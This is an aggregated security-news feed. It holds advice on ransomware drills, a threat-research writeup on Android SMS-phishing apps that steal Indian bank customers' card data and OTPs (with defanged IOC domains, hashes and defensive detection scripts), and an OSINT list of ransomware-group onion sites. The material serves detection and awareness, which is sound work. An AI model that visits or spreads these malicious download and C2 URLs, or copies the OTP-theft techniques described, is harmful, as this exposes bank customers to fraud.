While the above tips are important and useful, one critical area of ransomware preparedness overlooked by too many organizations is the need to develop — and then periodically rehearse — a plan for how everyone in the organization should respond in the event of a ransomware or data ransom incident. Drilling this breach response plan is key because it helps expose weaknesses in those plans that could be exploited by the intruders. As noted in last year’s story Don’t Wanna Pay Ransom Gangs? Test Your Backups, experts say the biggest reason ransomware targets and/or their insurance providers still pay when they already have reliable backups of their systems and data is that nobody at the victim organization bothered to test in advance how long this data restoration process might take. “Suddenly the victim notices they have a couple of petabytes of data to restore over the Internet, and they realize that even with their fast connections it’s going to take three months to download all these backup files,” said Fabian Wosar, chief technology officer at Emsisoft. “A lot of IT teams never actually make even a back-of-the-napkin calculation of how long it would take them to restore from a data rate perspective.”
Categories: Security Posts

Credit card skimming – the long and winding road of supply chain failure

Naked Security Sophos - Thu, 2022/12/08 - 19:58
Don't keep calling home to a JavaScript server that closed its doors eight years ago!
Categories: Security Posts

SMS scams trick Indian banking customers into installing malicious apps

Zscaler Research - Thu, 2022/12/08 - 18:30
Zscaler's ThreatLabz researchers recently observed the rise of a sophisticated phishing campaign spreading via fake banking sites targeting large Indian banks such as HDFC, AXIS and SBI. The team will continue monitoring the emerging situation and will provide an update on any significant new developments.

Previously, ThreatLabz researchers observed Indian banking customers being targeted with fake complaint forms from phishing sites spreading short message service (SMS) mobile text stealer malware. In contrast, this new campaign leverages fake card update sites to spread Android-based phishing malware aimed at collecting banking information for financial fraud.

Campaign 1: Targeting HDFC and Axis banks

ThreatLabz researchers observed domains serving links for fake bank-related application downloads, as shown in Fig. 1 and Fig. 2 below.

Fig 1. Imitation application phishing site targeting HDFC bank customers

Fig 2. Imitation application phishing site targeting Axis bank customers

The two screenshots above show how these phishing scammers impersonate banking sites to obtain customers' sensitive information by incentivizing them to fill out fake applications to redeem their earned card points for cash or a voucher. In most cases, these sites are spread through SMS text messages to victims. Once a user clicks the contained link, the victim is prompted to install Android-based phishing malware designed to steal critical financial data.

Fig 3. Phishing page for HDFC bank credit card application

Upon opening the app, the user sees the fake page presented in Fig 3, prompting them to enter sensitive information including card number, expiration date, cardholder name, phone number, date of birth, etc., to redeem points for cash or vouchers. Once the victim submits their sensitive information into the fake form, the malware sends a copy to the command-and-control (C2) server shown in the screenshot below.

Fig 4. In-App phishing page creation and C2

On the second run, or on completion of the prompted tasks, a timer screen is displayed to the user, as revealed in the code shown in Fig 5 below.

Fig 5. Final page shown to the user, as in the second screenshot in Fig 3

Upon receiving all of the victim's sensitive form-fill information, including card details, the threat actor is capable of initiating fraudulent financial transactions. All they require to carry out the attack is a one-time password (OTP). To collect the OTP, victims are further prompted to grant SMS permission to the malicious app at install time. Once the user grants SMS permissions, the malware is capable of exfiltrating received SMS text messages containing the OTP codes the attackers need. To complete a transaction initiated using the user's card details, the application intercepts the OTP codes and forwards them to the C2 server.

Fig 6. Writing phishing data in shared preferences and MFA extraction

This malware also employs a cloaking technique that prevents the phishing page from being shown a second time. It writes data into the modifiable shared preferences settings, using the first-time install data written in the "time" object as its reference point, to block users from seeing the card phishing page again.

Fig 6. Cloaking to not load phishing page after first-time run

Campaign 2: Targeting SBI bank customers with KYC verification scam

In other campaigns, ThreatLabz researchers observed adversaries sending SMS text messages prompting users to immediately update their 'Know Your Customer' (KYC) identity verification, a banking requirement, or to take another similarly urgent action to avoid their account being blocked or locked out. The false sense of urgency created by adversaries is very effective at convincing victims to perform the requested action, including downloading apps to perform the task.
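A static check for the behaviour described above, added here as an illustration rather than code from Zscaler or from the campaign: it parses a decoded AndroidManifest.xml and flags the combination of SMS permissions and an SMS_RECEIVED broadcast receiver that an OTP-stealing app needs. The two manifests are constructed samples with hypothetical package and class names; a real APK's manifest is binary-encoded and has to be decoded (for instance with apktool) before it can be parsed this way.

```python
# Static triage of a decoded AndroidManifest.xml for the pattern the post
# describes: an app that requests SMS permissions and registers a receiver
# for incoming SMS so it can read OTP codes. Added illustration, not Zscaler's
# tooling. Decode the binary manifest (e.g. with apktool) before using this.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS  # ElementTree's Clark notation for android:name

# Permissions that let an app read the texts carrying a bank's OTP.
SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
}
# Broadcast action an SMS-stealing receiver registers for.
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"

# Constructed sample manifest; package name and class names are hypothetical.
SUSPICIOUS_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.cardupdate">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <application android:label="Card Update">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name=".SmsReceiver" android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Constructed manifest of an app that only needs network access, for contrast.
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.weather">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Weather">
        <activity android:name=".MainActivity"/>
    </application>
</manifest>
"""


def triage_manifest(manifest_xml: str) -> dict:
    """Return what the manifest declares and whether the SMS-harvesting
    combination (SMS permission + SMS_RECEIVED receiver) is present."""
    root = ET.fromstring(manifest_xml)

    declared = {el.get(NAME_ATTR) for el in root.iter("uses-permission")}
    sms_permissions = sorted(declared & SMS_PERMISSIONS)

    sms_receivers = []
    for receiver in root.iter("receiver"):
        actions = {a.get(NAME_ATTR) for a in receiver.iter("action")}
        if SMS_RECEIVED_ACTION in actions:
            sms_receivers.append(receiver.get(NAME_ATTR))

    return {
        "package": root.get("package"),
        "sms_permissions": sms_permissions,
        "sms_receivers": sms_receivers,
        # Either piece alone has legitimate uses; together they are what the
        # OTP-stealing apps in this campaign need, so that is the flag.
        "suspicious": bool(sms_permissions) and bool(sms_receivers),
    }


if __name__ == "__main__":
    for manifest in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        print(triage_manifest(manifest))
```

The flag is deliberately the conjunction: a messaging app legitimately asks for SMS permissions, and a receiver alone does nothing without them, so reviewing the pair is what separates this campaign's apps from ordinary ones in bulk triage.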
In the cases observed in this article, all of these requests were fake; the attacks infected users with malicious apps and stole personal banking information. The screenshot below shows an attack where the user is prompted to download a malicious app to unlock their account.

Fig 7. Smishing campaigns

Unlike campaign 1, where applications used in-app fake login pages, the applications in this SBI bank KYC verification scam rely on command servers to render the phishing pages. ThreatLabz researchers believe this is how the malware authors are able to create new campaigns so quickly, since only a few changes, such as updating C2 destinations, are required to spin up a new campaign. The application starts by prompting users to log in to a fake SBI bank web page and then to update their KYC verification, shown in Fig 8 below.

Fig 8. Fake login page redirect hosted on Firebase

Users are navigated through a series of web pages hosted on Firebase upon entering banking credentials, mobile number, etc., shown in Fig 9.

Fig 9. Login data phishing used to steal banking credentials

The user is prompted to enter an OTP during each fake update step to make the application appear legitimate, shown in Fig 10 below; this tactic can also be used to steal the OTP and gain access.

Fig 10. Prompting users for OTP

The user is then directed to a page and prompted to provide banking information, shown in Fig 11 below. Along with the bank details, the user is prompted to enter their Permanent Account Number (PAN).

Fig 11. Application prompts user to provide sensitive banking information

Apart from collecting OTPs through phishing pages, the malware developers have also implemented code routines to harvest OTPs from incoming SMS text messages and send them to a secondary C2 as well as to a hard-coded phone number, as shown below.

Fig 12. Code to send incoming SMS data to C2

Fig 13. Testing of SMS data exfiltration to static number

Fig 14. Traffic showing data upload to a remote server

The Zscaler sandbox is able to detect this malware's threat behavior and techniques.

Fig 15. Zscaler sandbox report showing detection of malicious applications

Zscaler advises users not to install any unknown applications sent through SMS text messages, especially if the messages claim to come from a financial institution or bank; this is a common practice used by threat actors to impose a false sense of urgency on users so that they act immediately without additional scrutiny.

Indicators of Compromise (IOC)

Campaign 1 IOCs

Domains:
hxxps[://]updateyourcard[.]in/HDFC_Credit_Card[.]apk
hxxps[://]cardupdatation[.]in/
hxxps[://]cardupdate[.]in/
hxxp[://]pointincash[.]xyz/hdfc_version1.0[.]9[.]1[.]apk

MD5s:
df0b9265d07ffe523884f98613db8401
47eebf0d4ab713d53ec9f3b992777c18
a57c255e5e69d843a1c402df96ced959
ce8e95ef802d9943c2ff7abea1aa94da

Campaign 2 IOCs

Domains:
hxxps[://]sheltered-dawn-11337[.]herokuapp[.]com/SBI-KYC[.]apk
hxxps[://]sbi-kyc-update-immediately[.]web[.]app/SBI-KYC[.]apk
hxxps[://]sbi-users-kyc-1[.]web[.]app/SBI-KYC[.]apk
hxxps[://]sbi-user-kyc-app[.]web[.]app/SBI-KYC[.]apk
hxxps[://]kyc-update-app[.]web[.]app/SBI-KYC[.]apk
hxxps[://]sbi-kyc-apps-v-23[.]web[.]app/SBI-KYC[.]apk
hxxps[://]point-dekho[.]xyz/save_sms[.]php
hxxps[://]sbi-kyc-app[.]web[.]app/sbi-kyc[.]apk
hxxps[://]sbi-kyc-points[.]web[.]app/sbi-kyc[.]apk
hxxps[://]sbi-kyc-points[.]firebaseapp[.]com/sbi-kyc[.]apk
hxxps[://]sbi-kyc-update-immediately[.]firebaseapp[.]com/sbi-kyc[.]apk
hxxps[://]applicationkyc[.]pages[.]dev/SBI-KYC[.]apk
hxxps[://]calm-fjord-69600[.]herokuapp[.]com/SBI-KYC[.]apk
hxxps[://]calm-garden-42338[.]herokuapp[.]com/SBI-KYC[.]apk
hxxps[://]please-visitnow-immediately[.]com/SBI-KYC[.]apk
hxxps[://]publicationofindia[.]top/SBI-KYC[.]apk

MD5s:
0076369748034430dd9345fecd0d130a
f8509e2b72b3ba5916d80888b990b285
f0b6619e42722673e6599471a048edb1
436370a26633fb3a86f2ae2f09bcdb18
1aa0baa0c2fa54a89ecbfe71225726c6
331a9054e877a7210789315f7bcd2620
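To put the indicators above to use, here is an added example (not Zscaler's code) that refangs the published domain indicators and matches them against web proxy log lines. Only the IOCs come from the post; the log lines are constructed for illustration. The hostname matching also catches subdomains of an indicator, but deliberately does not match the shared hosting parent (web.app, herokuapp.com) that several indicators live under.

```python
# Normalises the defanged IOCs published above into matchable hostnames and
# checks them against web proxy log lines. Added illustration, not Zscaler's
# code; the log lines are constructed, only the IOCs come from the post.
import re
from urllib.parse import urlsplit

# Subset of the Campaign 1 and Campaign 2 domain IOCs listed above, as published.
DEFANGED_IOCS = [
    "hxxps[://]updateyourcard[.]in/HDFC_Credit_Card[.]apk",
    "hxxps[://]cardupdatation[.]in/",
    "hxxps[://]cardupdate[.]in/",
    "hxxp[://]pointincash[.]xyz/hdfc_version1.0[.]9[.]1[.]apk",
    "hxxps[://]sbi-kyc-update-immediately[.]web[.]app/SBI-KYC[.]apk",
    "hxxps[://]point-dekho[.]xyz/save_sms[.]php",
]

# Constructed proxy log: "<timestamp> <client-ip> <method> <url> <status>".
# The fourth line is there to show that the hosting parent alone is not a hit.
SAMPLE_LOG = """\
2022-12-05T10:12:01Z 10.0.0.5 GET https://www.example.com/ 200
2022-12-05T10:12:09Z 10.0.0.5 GET https://cardupdate.in/ 200
2022-12-05T10:13:44Z 10.0.0.7 GET https://sbi-kyc-update-immediately.web.app/SBI-KYC.apk 200
2022-12-05T10:14:10Z 10.0.0.7 GET https://web.app/ 404
2022-12-05T10:15:02Z 10.0.0.9 POST https://point-dekho.xyz/save_sms.php 200
"""


def refang(ioc: str) -> str:
    """Undo the usual defanging: hxxp -> http, [://] -> ://, [.] -> ."""
    s = ioc.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    return s.replace("[://]", "://").replace("[.]", ".").replace("[:]", ":")


def ioc_hostnames(defanged_iocs) -> set:
    """Hostnames of the refanged URLs (urlsplit lower-cases them)."""
    return {urlsplit(refang(i)).hostname for i in defanged_iocs}


def host_matches(host: str, indicators: set) -> bool:
    """True when host is an indicator or a subdomain of one. The reverse
    direction is not a match: 'web.app' is not an indicator just because
    an indicator is hosted under it."""
    return any(host == ind or host.endswith("." + ind) for ind in indicators)


def find_hits(log_text: str, indicators: set) -> list:
    """Return (client_ip, hostname, url) for every log line touching an IOC."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line; skip rather than guess
        _ts, client, _method, url, _status = fields[:5]
        host = urlsplit(url).hostname or ""
        if host_matches(host, indicators):
            hits.append((client, host, url))
    return hits


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG, ioc_hostnames(DEFANGED_IOCS)):
        print(hit)
```

Run as a script it prints the three matching lines. A POST to the save_sms.php path after an APK download from one of the listed hosts is exactly the SMS exfiltration the post describes, so the client IP in that hit is the device to pull for review. The MD5 indicators are matched separately against file-hash telemetry, which this example does not cover.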

Exposing a Compilation of Known Ransomware Group's Dark Web Onion Web Sites - An OSINT Analysis - Part Three

Dear blog readers,
I've decided to share with everyone part three of my "Exposing a Compilation of Known Ransomware Group's Dark Web Onion Web Sites - An OSINT Analysis" compilation of known ransomware themed Dark Web onion web sites.
Check out part one and part two here. Sample list of known and currently active Dark Web onion web sites known to have been involved in ransomware themed campaigns:

hxxp://omegalock5zxwbhswbisc42o2q2i54vdulyvtqqbudqousisjgc7j7yd.onion
hxxp://abrahamm32umasogaqojib3ey2w2nwoafffrguq43tsyke4s3fz3w4yd.onion
hxxp://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion
hxxp://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion
hxxp://3kp6j22pz3zkv76yutctosa6djpj4yib2icvdqxucdaxxedumhqicpad.onion
hxxp://anewset3pcya3xvk73hj7yunuamutxxsm5sohkdi32blhmql55tvgqad.onion
hxxp://mhdehvkomeabau7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wlqd.onion
hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion
hxxp://nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion
hxxp://bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad.onion
hxxp://bl4cktorpms2gybrcyt52aakcxt6yn37byb65uama5cimhifcscnqkid.onion
hxxp://f5uzduboq4fa2xkjloprmctk7ve3dm46ff7aniis66cbekakvksxgeqd.onion
hxxp://jbeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad.onion
hxxp://blackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7mifuedyd.onion
hxxp://bonacifryrxr4siz6ptvokuihdzmjzpveruklxumflz5thmkgauty2qd.onion
hxxp://rwiajgajdr4kzlnrj5zwebbukpcbrjhupjmk6gufxv6tg7myx34iocad.onion
hxxp://santat7kpllt6iyvqbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad.onion
hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion
hxxp://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion
hxxp://7k4yyskpz3rxq5nyokf6ztbpywzbjtdfanweup3skctcxopmt7tq7eid.onion
hxxp://7ukmkdtyxdkdivtjad57klqnd3kdsmq6tp45rrsxqnu76zzv3jvitlqd.onion
hxxp://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnz6hhj7id.onion
hxxp://woqjumaahi662ka26jzxyx7fznbp4kg3bsjar4b52tqkxgm2pylcjlad.onion
hxxp://hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion
hxxp://xqkz2rmrqkeqf6sjbrb47jfwnqxcd4o2zvaxxzrpbh2piknms37rw2ad.onion
hxxp://leaksv7sroztl377bbohzl42i3ddlfsxopcb6355zc7olzigedm5agad.onion
hxxp://ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad.onion
hxxp://griefcameifmv4hfr3auozmovz5yi6m3h3dwbuqw7baomfxoxz4qteid.onion
hxxp://ws3dh6av66sjbxxkjpw5ao3wqzmtejnkzheswm4dz5rrwvular7xvkqd.onion
hxxp://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion
hxxp://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion
hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion
hxxp://kf6x3mjeqljqxjznaw65jixin7dpcunfxbbakwuitizytcpzn4iy5bad.onion
hxxp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
hxxp://lockbit7z2jwcskxpbokpemdxmltipntwlkmidcll2qirbu7ykg46eyd.onion
hxxp://wm6mbuzipviusuc42kcggzkdpbhuv45sn7olyamy6mcqqked3waslbqd.onion
hxxp://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion
hxxp://4qbxi3i2oqmyzxsjg4fwe4aly3xkped52gq5orp6efpkeskvchqe27id.onion
hxxp://rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad.onion
hxxp://jvdamsif53dqjycuozlaye2s47p7xij4x6hzwzwhzrqmv36gkyzohhqd.onion
hxxp://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion
hxxp://midasbkic5eyfox4dhnijkzc7v7e4hpmsb2qgux7diqbpna4up4rtdad.onion
hxxp://mobikwikoonux37wauz6oqymshuvebj5u763rutlogc2fb2o3ugcazid.onion
hxxp://gg5ryfgogainisskdvh4y373ap3b2mxafcibeh2lvq5x7fx76ygcosad.onion
hxxp://vbfqeh5nugm6r2u2qvghsdxm3fotf5wbxb5ltv6vw77vus5frdpuaiid.onion
hxxp://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion
hxxp://mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd.onion
hxxp://pysa2bitc5ldeyfak4seeruqymqs4sj5wt5qkcq7aoyg4h2acqieywad.onion
hxxp://ozsxj4hwxub7gio347ac7tyqqozvfioty37skqilzo2oqfs4cw2mgtyd.onion
hxxp://quantum445bh3gzuyilxdzs5xdepf3b7lkcupswvkryf3n7hgzpxebid.onion
hxxp://wobpitin77vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion
hxxp://sushlnty2j7qdzy64qnvyb6ajkwg7resd3p6agc2widnawodtcedgjid.onion
hxxp://rgleaktxuey67yrgspmhvtnrqtgogur35lwdrup4d3igtbm3pupc4lyd.onion
hxxp://wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion
hxxp://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion
hxxp://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid.onion
hxxp://blog2hkbm6gogpv2b3uytzi3bj5d5zmc4asbybumjkhuqhas355janyd.onion
hxxp://relic5zqwemjnu4veilml6prgyedj6phs7de3udhicuq53z37klxm6qd.onion
hxxp://blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion
hxxp://gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qlmjmole2zbyd.onion
hxxp://royal4ezp7xrbakkus3oofjw6gszrohpodmdnfbe5e4w3og5sm7vb3qd.onion
hxxp://hl66646wtlp2naoqnhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion
hxxp://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion
hxxp://3slz4povugieoi3tw7sblxoowxhbzxeju427cffsst5fo2tizepwatid.onion
hxxp://x2miyuiwpib2imjr5ykyjngdu7v6vprkkhjltrk4qafymtawey4qzwid.onion
hxxp://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad.onion
hxxp://xingnewj6m4qytljhfwemngm7r7rogrindbq7wrfeepejgxc3bwci7qd.onion
hxxp://jukswsxbh3jsxuddvidrjdvwuohtsy4kxg2axbppiyclomt2qciyfoad.onion
hxxp://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx6o77yvmpwt7gklffqd.onion
hxxp://sbc2zv2qnz5vubwtx3aobfpkeao6l4igjegm3xx7tk5suqhjkp5jxtqd.onion
hxxp://3f7nxkjway3d223j27lyad7v5cgmyaifesycvmwq7i7cbs23lb6llryd.onion
hxxp://dfpc7yvle5kxmgg6sbcp5ytggy3oeob676bjgwcwhyr2pwcrmbvoilqd.onion
hxxp://ranionv3j2o7wrn3um6de33eccbchhg32mkgnnoi72enkpp7jc25h3ad.onion
hxxp://nalr2uqsave7y2r235am5jsfiklfjh5h4jc5nztu3rzvmhklwt5j6kid.onion
hxxp://fl3xpz5bmgzxy4fmebhgsbycgnz24uosp3u4g33oiln627qq3gyw37ad.onion
hxxp://gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa7efkz5bd5464id.onion
hxxp://aby6efzmp7jzbwgidgqc6ghxi2vwpo6d7eaood5xuoxutrfofsmzcjqd.onion
hxxp://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion
hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion
hxxp://ransomwr3tsydeii4q43vazm7wofla5ujdajquitomtd47cxjtfgwyyd.onion
hxxp://ranswikiif2mir7mnnscyrsvppxmwwqrvc43fhtddvtnmhedkj4hopyd.onion
hxxp://54bb47h5qu4k7l4d7v5ix3i6ak6elysn3net4by4ihmvrhu7cvbskoqd.onion
hxxp://giphvoitymatg4cv7bxqh5dz6sn6bfscywoat4qtslztkomf5lavrayd.onion
hxxp://kwvhrdibgmmpkhkidrby4mccwqpds5za6uo2thcw5gz75qncv7rbhyad.onion
hxxp://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion
hxxp://vqifktlreqpudvulhbzmc5gocbeawl67uvs2pttswemdorbnhaddohyd.onion
hxxp://xxz6hl6wwoa25er62tbjdxda4nxyt5iqziavb73mhda6q6zujsgfoxqd.onion
hxxp://l5cjga2ksw6rxumu5l4xxn3cmahhi2irkbwg3amx6ajroyfmfgpfllid.onion
hxxp://babydovegkmhbontykziyq7qivwzy33mu4ukqefe4mqpiiwd3wibnjqd.onion
hxxp://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion
hxxp://nclen75pwlgebpxpsqhlcnxsmdvpyrr7ogz36ehhatfmkvakeyden6ad.onion
hxxp://obzuqvr5424kkc4unbq2p2i67ny3zngce3tbdr37nicjqesgqcgomfqd.onion
hxxp://ce6roic2ykdjunyzazsxmjpz5wsar4pflpoqzntyww5c2eskcp7dq4yd.onion
hxxp://6iaj3efye3q62xjgfxyegrufhewxew7yt4scxjd45tlfafyja6q4ctqd.onion
hxxp://dlyo7r3n4qy5fzv4645nddjwarj7wjdd6wzckomcyc7akskkxp4glcad.onion
hxxp://supp24maprinktc7uizgfyqhisx7lkszb6ogh6lwdzpac23w3mh4tvyd.onion
hxxp://ccpyeuptrlatb2piua4ukhnhi7lrxgerrcrj4p2b5uhbzqm2xgdjaqid.onion
hxxp://z6vidveub2ypo3d3x7omsmcxqwxkkmvn5y3paoufyd2tt4bfbkg33kid.onion
hxxp://z6mikrtphid5fmn52nbcbg25tj57sowlm3oc25g563yvsfmygkcxqbyd.onion
hxxp://ncpbxzcgdeprrbba7dgodmymdewy57yokkebuwhmuywiuz5kqjwepbad.onion
hxxp://dgnh6p5uq234zry7qx7bh73hj5ht3jqisgfet6s7j7uyas5i46xfdkyd.onion
hxxp://adminavf4cikzbv6mbbp7ujpwhygnn2t3egiz2pswldj32krrml42wyd.onion
hxxp://veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id.onion
hxxp://h44jyyfomcbnnw5dha7zgwgkvpzbzbdyx2onu4fxaa5smxrgbjgq7had.onion
hxxp://dg5fyig37abmivryrxlordrczn6d6r5wzcfe2msuo5mbbu2exnu46fid.onion
hxxp://7iulpt5i6whht6zo2r52f7vptxtjxs3vfcdxxazllikrtqpupn4epnqd.onion
hxxp://hkk62og3s2tce2gipcdxg3m27z4b62mrmml6ugctzdxs25o26q3a4mid.onion
hxxp://3r6n77mpe737w4sbxxxrpc5phbluv6xhtdl5ujpnlvmck5tc7blq2rqd.onion
hxxp://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion
hxxp://r6d636w47ncnaukrpvlhmtdbvbeltc6enfcuuow3jclpmyga7cz374qd.onion
hxxp://spyarea23ttlty6qav3ecmbclpqym3p32lksanoypvrqm6j5onstsjad.onion
hxxp://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion
hxxp://yeuajcizwytgmrntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid.onion
hxxp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
hxxp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
hxxp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
hxxp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
hxxp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
hxxp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
hxxp://oyarbnujct53bizjguvolxou3rmuda2vr72osyexngbdkhqebwrzsnad.onion
hxxp://yq43odyrmzqvyezdindg2tokgogf3pn6bcdtvgczpz5a74tdxjbtk2yd.onion
hxxp://lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
hxxp://lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onion
hxxp://lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion
hxxp://lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion
hxxp://lockbitfile2tcudkcqqt2ve6btssyvqwlizbpv5vz337lslmhff2uad.onion
hxxp://lockbitnotexk2vnf2q2zwjefsl3hjsnk4u74vq4chxrqpjclfydk4ad.onion
hxxp://zqaflhty5hyziovsxgqvj2mrz5e5rs6oqxzb54zolccfnvtn5w2johad.onion
hxxp://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
hxxp://fvki3hj7uxuirxpeop6chgqoczanmebutznt2mkzy6waov6w456vjuid.onion
hxxp://xembshruusobgbvxg4tcjs3jpdnks6xrr6nbokfxadcnlc53yxir22ad.onion
hxxp://z6wkgghtoawog5noty5nxulmmt2zs7c3yvwr22v4czbffdoly2kl4uad.onion
hxxp://mblogci3rudehaagbryjznltdp33ojwzkq6hn2pckvjq33rycmzczpid.onion
hxxp://dfpc7yvle5kxmgg6sbcp5ytggy3oeob676bjgwcwhyr2pwcrmbvoilqd.onion
hxxp://moishddxqnpdxpababec6exozpl2yr7idfhdldiz5525ao25bmasxhid.onion
hxxp://n3twormruynhn3oetmxvasum2miix2jgg56xskdoyihra4wthvlgyeyd.onion
hxxp://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion
hxxp://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion
hxxp://lirncvjfmdhv6samxvvlohfqx7jklfxoxj7xn3fh7qeabs3taemdsdqd.onion
hxxp://5mvifa3xq5m7sou3xzaajfz7h6eserp5fnkwotohns5pgbb5oxty3zad.onion
hxxp://vbmisqjshn4yblehk2vbnil53tlqklxsdaztgphcilto3vdj4geao5qd.onion
hxxp://k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd.onion
hxxp://msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion
hxxp://kbsqoivihgdmwczmxkbovk7ss2dcynitwhhfu5yw725dboqo5kthfaad.onion
hxxp://gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion
hxxp://u67aylig7i6l657wxmp274eoilaowhp3boljowa6bli63rxyzfzsbtyd.onion
hxxp://cartelraqonekult2cxbzzz2ukiff7v6cav3w373uuhenybgqulxm5id.onion
hxxp://zohlm7ahjwegcedoz7lrdrti7bvpofymcayotp744qhx6gjmxbuo2yid.onion
hxxp://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion
hxxp://landxxeaf2hoyl2jvcwuazypt6imcsbmhb7kx3x33yhparvtmkatpaad.onion
hxxp://royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion
hxxp://t2tqvp4pctcr7vxhgz5yd5x4ino5tw7jzs3whbntxirhp32djhi7q3id.onion
hxxp://solidb2jco63vbhx4sfimnqmwhtdjk4jbbgq7a24cmzzkfse4rduxgid.onion
